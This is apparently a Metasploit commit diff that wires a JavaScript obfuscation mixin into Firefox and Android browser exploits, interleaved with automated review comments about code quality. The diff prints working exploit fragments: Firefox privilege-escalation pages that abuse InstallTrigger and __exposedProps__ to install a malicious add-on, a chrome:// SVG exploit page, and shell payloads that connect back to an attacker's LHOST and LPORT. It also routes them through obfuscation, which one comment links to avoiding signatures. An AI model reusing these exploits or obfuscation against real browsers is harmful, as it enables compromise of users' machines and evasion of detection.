Land #3844 - Add the JSObfu mixin to Firefox exploits
commit
9e5826c4eb
@ -5,7 +5,7 @@ PATH
|
||||
actionpack (< 4.0.0)
|
||||
activesupport (>= 3.0.0, < 4.0.0)
|
||||
bcrypt
|
||||
jsobfu (~> 0.1.7)
|
||||
jsobfu (~> 0.2.0)
|
||||
json
|
||||
metasploit-concern (~> 0.2.1)
|
||||
metasploit-model (~> 0.27.1)
|
||||
@ -91,7 +91,7 @@ GEM
|
||||
hike (1.2.3)
|
||||
i18n (0.6.11)
|
||||
journey (1.0.4)
|
||||
jsobfu (0.1.7)
|
||||
jsobfu (0.2.0)
|
||||
rkelly-remix (= 0.0.6)
|
||||
json (1.8.1)
|
||||
mail (2.5.4)
|
||||
|
@ -20,7 +20,7 @@ module Exploit::Android
|
||||
|
||||
def add_javascript_interface_exploit_js(arch)
|
||||
stagename = Rex::Text.rand_text_alpha(5)
|
||||
script = %Q|
|
||||
%Q|
|
||||
function exec(runtime, cmdArr) {
|
||||
var ch = 0;
|
||||
var output = '';
|
||||
@ -84,9 +84,6 @@ module Exploit::Android
|
||||
|
||||
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
||||
|
|
||||
|
||||
# remove comments and empty lines
|
||||
script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
|
||||
end
|
||||
|
||||
|
||||
|
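Review bot: With the `script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')` post-processing removed, `add_javascript_interface_exploit_js` now returns its JavaScript with the `//` comments and blank lines intact, and the only thing that would strip them is a later `js_obfuscate` call that this hunk does not show (what looks like the Android module elsewhere in this commit even deregisters `JsObfuscate`). If the intent is to rely on the obfuscator, a comment at the end of the method, `# comments are left in; callers are expected to run this through js_obfuscate`, would make that dependency explicit. The removed regex also mangled `//` inside string literals such as `http://`, so if that was the motivation it is worth recording. The method's body starts outside the hunk.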
@ -7,16 +7,24 @@
|
||||
#
|
||||
###
|
||||
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
module Msf
|
||||
module Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
# automatically obfuscate anything that runs through `js_exec`
|
||||
include Msf::Exploit::JSObfu
|
||||
|
||||
# Sends the +js+ code to the remote session, which executes it in Firefox's
|
||||
# privileged javascript context
|
||||
# privileged javascript context. The code will be obfuscated if the JsObfuscate
|
||||
# datastore option is set to 1 or higher.
|
||||
#
|
||||
# @return [String] the results that were sent back. This can be achieved through
|
||||
# calling the "send" function, or by just returning the value in +js+
|
||||
def js_exec(js, timeout=30)
|
||||
print_status "Running the privileged javascript..."
|
||||
token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
|
||||
js = js_obfuscate(js)
|
||||
session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
|
||||
session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
|
||||
end
|
||||
|
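Review bot: `js = js_obfuscate(js)` is called unconditionally, while the docstring just above promises obfuscation only when JsObfuscate is 1 or higher; the gating presumably lives inside `Msf::Exploit::JSObfu#js_obfuscate`, which is not in this hunk, so a comment on the call such as `# no-op unless JsObfuscate >= 1 (see Msf::Exploit::JSObfu)` keeps the two from drifting. Routing every privileged script through the obfuscator also means the source is parsed on the attacker side before it is sent, so a payload with a JavaScript syntax error would now fail in `js_exec` instead of inside Firefox, and the `@return` doc does not mention that the method can raise. Either document that, or rescue the obfuscation failure, warn, and fall back to the unobfuscated source.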
@ -1,9 +1,13 @@
|
||||
# -*- coding: binary -*-
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
require 'json'
|
||||
|
||||
module Msf::Payload::Firefox
|
||||
|
||||
# automatically obfuscate every Firefox payload
|
||||
include Msf::Exploit::JSObfu
|
||||
|
||||
# Javascript source code of setTimeout(fn, delay)
|
||||
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
|
||||
def set_timeout_source
|
||||
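Review bot: Including `Msf::Exploit::JSObfu` in `Msf::Payload::Firefox` gives every Firefox payload whatever datastore option the mixin registers (the Android exploit elsewhere in this commit has to `deregister_options('JsObfuscate')` to hide it), so the option now surfaces on payloads as well as exploits, and an exploit-namespace mixin is being used from a payload. If that is intentional, the comment `# automatically obfuscate every Firefox payload` should also say where the obfuscation is applied, since `generate` is not in this hunk; for example `# every Firefox payload honours JsObfuscate; js_obfuscate is applied in generate` once that is confirmed.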
@ -121,14 +125,15 @@ module Msf::Payload::Firefox
|
||||
var retVal = null;
|
||||
|
||||
try {
|
||||
retVal = Function('send', js[1])(function(r){
|
||||
this.send = function(r){
|
||||
if (sent) return;
|
||||
sent = true;
|
||||
if (r) {
|
||||
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
|
||||
else cb(false, r+tag+"\\n");
|
||||
}
|
||||
});
|
||||
};
|
||||
retVal = Function(js[1]).call(this);
|
||||
} catch (e) { retVal = e.message; }
|
||||
|
||||
sync = false;
|
||||
|
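Review bot: `this.send = function(r){...}` installs the reply callback as a property of the shared scope object and never removes it, whereas the old `Function('send', js[1])(...)` kept it as a call-scoped parameter; after `Function(js[1]).call(this)` returns, a stale closure over this message's `cb` and `tag` stays reachable as `this.send` until the next message overwrites it. The post modules in this commit capture the function immediately (`})(this.send)`), so it can be released once the snippet has run: `} catch (e) { retVal = e.message; } finally { delete this.send; }`. The `sent` flag and `sync` are declared outside this hunk, so their per-message reset should be checked alongside this.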
@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
|
||||
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
|
||||
spec.add_runtime_dependency 'bcrypt'
|
||||
# Needed for Javascript obfuscation
|
||||
spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
|
||||
spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
|
||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||
spec.add_runtime_dependency 'json'
|
||||
# Metasploit::Concern hooks
|
||||
|
@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
:os_flavor => 'Android'
|
||||
}
|
||||
))
|
||||
|
||||
deregister_options('JsObfuscate')
|
||||
end
|
||||
|
||||
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
|
||||
|
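Review bot: `deregister_options('JsObfuscate')` hides the option the newly included mixin advertises without saying why, so a reader cannot tell whether this module's JavaScript is deliberately left unobfuscated or obfuscated somewhere else. A one-line comment above it, e.g. `# this module does not run its JavaScript through js_obfuscate; hide the inherited option`, records the decision (adjust to the real reason if it differs). The enclosing `initialize` starts outside the hunk.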
@ -79,21 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
"p2.constructor.defineProperty(obj,key,{get:runme});"
|
||||
end
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
if (!window.done) {
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
</div>
|
||||
<script>
|
||||
script = js_obfuscate %Q|
|
||||
try{InstallTrigger.install(0)}catch(e){p=e;};
|
||||
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
|
||||
p2.__exposedProps__={
|
||||
@ -116,6 +102,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
};
|
||||
for (var i in window) register(window, i);
|
||||
for (var i in document) register(document, i);
|
||||
|
|
||||
|
||||
js_payload = js_obfuscate %Q|
|
||||
if (!window.done) {
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
|
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
#{js_payload}
|
||||
</div>
|
||||
<script>
|
||||
#{script}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
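Review bot: `#{js_payload}` is obfuscator output dropped as raw text inside `<div id='payload' style='display:none'>`; the hand-written source it replaces contained no `<` or `&`, but nothing constrains the obfuscated text the same way, and such characters would be parsed as markup or entities before the exploit script reads the div back. How the div is consumed (textContent vs innerHTML) is outside this hunk, so either HTML-escape at this interpolation (`#{Rex::Text.html_encode(js_payload)}` if the reader decodes entities) or add a comment recording why the obfuscator's output is safe to inline here. The same concern applies more mildly to `#{script}` inside `<script>`, where a literal `</script` in the output would end the block early.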
@ -129,24 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
:loader_path => "#{get_module_uri}.swf",
|
||||
:content => self.datastore['CONTENT'] || ''
|
||||
}
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
</foreignObject>
|
||||
</symbol>
|
||||
<use />
|
||||
</svg>
|
||||
|
||||
<script>
|
||||
script = js_obfuscate %Q|
|
||||
var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
|
||||
var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
|
||||
function $() {
|
||||
@ -169,6 +152,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
document.querySelector('use').setAttributeNS(
|
||||
"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
|
||||
);
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
</foreignObject>
|
||||
</symbol>
|
||||
<use />
|
||||
</svg>
|
||||
|
||||
<script>
|
||||
#{script}
|
||||
</script>
|
||||
|
||||
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
|
||||
|
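Review bot: The whole script, including `var #{vars[:payload_obj_var]}` and `var #{vars[:payload_var]}`, now passes through `js_obfuscate`, so those top-level identifiers may come back renamed; the template continues below this hunk (the `<iframe ...>` line is cut off), and if anything outside this `<script>` block refers to `#{vars[:payload_var]}` by name it will no longer resolve. Worth checking, and if the names must survive, either exclude them from renaming or add `# obfuscation may rename these globals; nothing outside this script may reference them` above `script = js_obfuscate`.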
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
key = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
|
||||
|
||||
js = Rex::Exploitation::JSObfu.new(%Q|
|
||||
js = js_obfuscate %Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
var key = opts['#{key}'];
|
||||
var y = {}, q = false;
|
||||
@ -85,9 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return 5;
|
||||
};
|
||||
console.time(y);
|
||||
|)
|
||||
|
||||
js.obfuscate
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
|
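Review bot: Replacing `Rex::Exploitation::JSObfu.new(...)` plus `js.obfuscate` with `js_obfuscate` turns an unconditional obfuscation into one governed by the `JsObfuscate` datastore option, so this exploit's page is served unobfuscated whenever the option is below the threshold (its default is not visible here). If the module relied on obfuscation to avoid signatures, set the option's default in `initialize` or note the change in the module description; at minimum `# obfuscation now depends on JsObfuscate; it used to be unconditional` at the call site records the behaviour change. The enclosing method starts and ends outside the hunk.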
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
|
||||
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
|
||||
|
||||
js = Rex::Exploitation::JSObfu.new(%Q|
|
||||
js = js_obfuscate %Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
var key = opts['#{key}'];
|
||||
|
||||
@ -127,10 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
setTimeout(function(){top.vvv.close();}, 100);
|
||||
}, 10);
|
||||
}
|
||||
|
||||
|)
|
||||
|
||||
js.obfuscate
|
||||
|
|
||||
|
||||
%Q|
|
||||
<!doctype html>
|
||||
|
@ -34,6 +34,7 @@ module Metasploit3
|
||||
<<-EOS
|
||||
|
||||
(function(){
|
||||
window = this;
|
||||
#{read_file_source if datastore['WSCRIPT']}
|
||||
#{run_cmd_source if datastore['WSCRIPT']}
|
||||
|
||||
|
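Review bot: The added `window = this;` is an undeclared assignment inside the IIFE; where `window` is already a non-writable binding it silently does nothing, and where no `window` exists it creates a global alias of `this` — which of the two is intended is not stated. A comment above it, `// privileged scope may lack a window binding; alias the global object for the helper sources below`, would explain why it exists, and `var window = this;` would keep the alias local to the IIFE if a global is not required. The heredoc is cut off at the bottom of the hunk.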
@ -34,6 +34,7 @@ module Metasploit3
|
||||
def generate
|
||||
%Q|
|
||||
(function(){
|
||||
window = this;
|
||||
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
||||
var lport = #{datastore["LPORT"]};
|
||||
var rhost = "#{datastore['RHOST']}";
|
||||
|
@ -32,6 +32,8 @@ module Metasploit3
|
||||
<<-EOS
|
||||
|
||||
(function(){
|
||||
window = this;
|
||||
|
||||
Components.utils.import("resource://gre/modules/NetUtil.jsm");
|
||||
var host = '#{datastore["LHOST"]}';
|
||||
var port = #{datastore["LPORT"]};
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
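Review bot: `})(this.send);` works only because the Firefox payload harness assigns `this.send` right before running this snippet with `Function(js).call(this)`, a contract that lives in the payload code rather than in this post module; a reader here sees a bare `this.send` with nothing explaining where it comes from. A one-line comment above the closing call, `// send() is installed on the scope object by the Firefox payload harness before this runs`, would record that. The snippet's opening, presumably `(function(send){`, is above the hunk.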
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|.strip
|
||||
end
|
||||
end
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Post
|
||||
};
|
||||
|
||||
setTimeout(evt, 200);
|
||||
})(send);
|
||||
})(this.send);
|
||||
|
||||
|.strip
|
||||
end
|
||||
|
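Review bot: Here the reply is produced from `setTimeout(evt, 200)`, i.e. after the snippet has returned to the harness, and it keeps working only because `})(this.send)` copies the callback into the IIFE's parameter at call time instead of re-reading `this.send` later. That is what allows the harness to replace or clear `this.send` between messages, so it deserves a comment: `// capture this.send now; the harness may replace it before evt fires`. The rest of the snippet is above the hunk.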
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
|
||||
} catch (e) {
|
||||
send(e);
|
||||
}
|
||||
})(send);
|
||||
})(this.send);
|
||||
|
|
||||
end
|
||||
|
||||
|
@ -1,6 +1,5 @@
|
||||
require 'spec_helper'
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/remote/browser_exploit_server'
|
||||
|
||||
describe Msf::Exploit::Remote::BrowserExploitServer do
|
||||
|
||||
@ -58,6 +57,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
|
||||
server.start_service
|
||||
end
|
||||
|
||||
it_should_behave_like 'Msf::Exploit::JSObfu'
|
||||
|
||||
describe "#get_module_resource" do
|
||||
it "should give me a URI to access the exploit page" do
|
||||
module_resource = server.get_module_resource
|
||||
|
@ -0,0 +1,8 @@
|
||||
require 'spec_helper'
|
||||
require 'msf/core'
|
||||
|
||||
describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
|
||||
|
||||
it_should_behave_like 'Msf::Exploit::JSObfu'
|
||||
|
||||
end
|
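Review bot: The new spec names `Msf::Exploit::Remote::FirefoxPrivilegeEscalation` with only `require 'msf/core'`, so it depends on the framework autoloading that mixin; the BrowserExploitServer spec in this commit drops its explicit require the same way, so the style is consistent, but if autoload is not wired up in the spec environment the `describe` line fails at load time rather than as a test failure. If autoloading is the intended convention this is fine; otherwise `require 'msf/core/exploit/remote/firefox_privilege_escalation'` next to `require 'msf/core'` is a cheap guard. Note the file asserts nothing beyond what the shared group checks.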
@ -3,11 +3,11 @@ require 'msf/core'
|
||||
require 'msf/core/exploit/jsobfu'
|
||||
|
||||
|
||||
describe Msf::Exploit::JSObfu do
|
||||
shared_examples_for 'Msf::Exploit::JSObfu' do
|
||||
|
||||
subject(:jsobfu) do
|
||||
mod = ::Msf::Module.new
|
||||
mod.extend described_class
|
||||
mod.send(:initialize, {})
|
||||
mod
|
||||
end
|
||||
|
||||
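Review bot: Turning this file's top-level `describe` into `shared_examples_for 'Msf::Exploit::JSObfu'` means these examples no longer run on their own; they execute only where a spec says `it_should_behave_like 'Msf::Exploit::JSObfu'`, and those specs can only find the group if this file has been loaded first, which RSpec does not guarantee for ordinary spec files (shared groups typically live in a support file that spec_helper requires). A comment above the block, `# shared examples; run via it_should_behave_like from the consuming specs`, plus moving the group to a support file, would make that explicit. `mod.extend described_class` inside a shared group resolves to the including spec's class, which is the intent here, but is worth a comment too.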
@ -58,4 +58,5 @@ describe Msf::Exploit::JSObfu do
|
||||
expect(obj.to_s).to include(js)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|